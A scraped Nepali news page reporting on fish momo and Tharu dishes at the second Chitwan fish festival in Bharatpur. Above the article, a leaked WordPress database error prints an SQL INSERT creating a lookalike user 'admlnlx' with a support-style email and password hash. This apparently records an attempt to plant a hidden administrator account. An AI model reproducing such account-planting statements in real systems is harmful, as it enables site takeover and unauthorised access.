WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwKrn.BCnvZTlyTuXWo7bOHGySgvIi0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 10:16:04', '', 'admlnlx', 'admlnlx')
राजु चौधरी,
चितवन, पुस ४–
बफ मःम, चिकेन मःम र पछिल्लो समय केराको मःम खाने व्यक्ति कमै होलान् । पछिल्लो समय केराको मःम हरेक मेला महोत्सवमा आकर्षण बनिरहेको बेला अब माछाको मःम ले पनि आकर्षित बनाएको छ ।
सोमबार भरतपुरमा जारी दोस्रो चितवन मत्स्य महोत्सव–२०७३ हेर्न पुगेका भरतपुर–१२ का मणी न्यौपानेलाई पनि माछाको मःम ले आकर्षित गर्यो । स–परिवार मत्स्य महोत्सव हेर्न पुगेका न्यौपाने माछा मःम खानमा व्यस्त थिए । उनले भने–“अरुको मःम खाईयो, माछाको पहिलो पटक मःम खादैछु, निकै मिठो हुँदो रहेछ ।” उनी जस्तै थुप्रै दर्शकहरु सोमबार माछाको मःम र अन्य परिकार खानका लागि लामबद्ध भएका थिए ।
सोमबार महोत्सवको चौथो दिन दर्शकहरुको अत्याधिक चाप रहेको थियो ।

महोत्सव हेर्न पुगेका जोकोहीलाई पनि माछाको परिकारले आकर्षित गर्दै थियो । माछाको मःम विक्री गर्न बसेका रत्न महर्जनले दर्शकहरुबाट माछाको मःम को अत्याधिक माग बढेको बताए । उनले जो कोही पनि माछाको मःम खाएर सन्तुष्ट भएर फर्किए बताए । विशेषगरि जलकपुर माछाबाछ मःम बनाईन्छ ।
महोत्सव हेर्न पुगेका दर्शकहरुलाई माछाको परिकारले मात्रै आकर्षित गरेन् । विशेष परिकार सहित स्टल राखेको थारु परिकारकाले पनि मोहित बनायो । सङवा महिला समूह खैरहनी नगरपालिका–१४ बडगाउँले राखेको स्टलमा थारु परिकारको स्वाद चाख्न पनि दर्शकहरुको उत्तिकै भीड थियो ।

समूहकी अध्यक्ष विना चौधरीले विशेषगरि दर्शकहरुले चिचर र घोङगी परिकार बढि मन पराएको बताईन् । सोमबार सबैभन्दा बढि घोङगीको परिकार विक्री भएको उनले बताईन् । यसपटक यीनै परिकारहरुले मत्स्य महोत्सवको आकर्षण बनेको थियो ।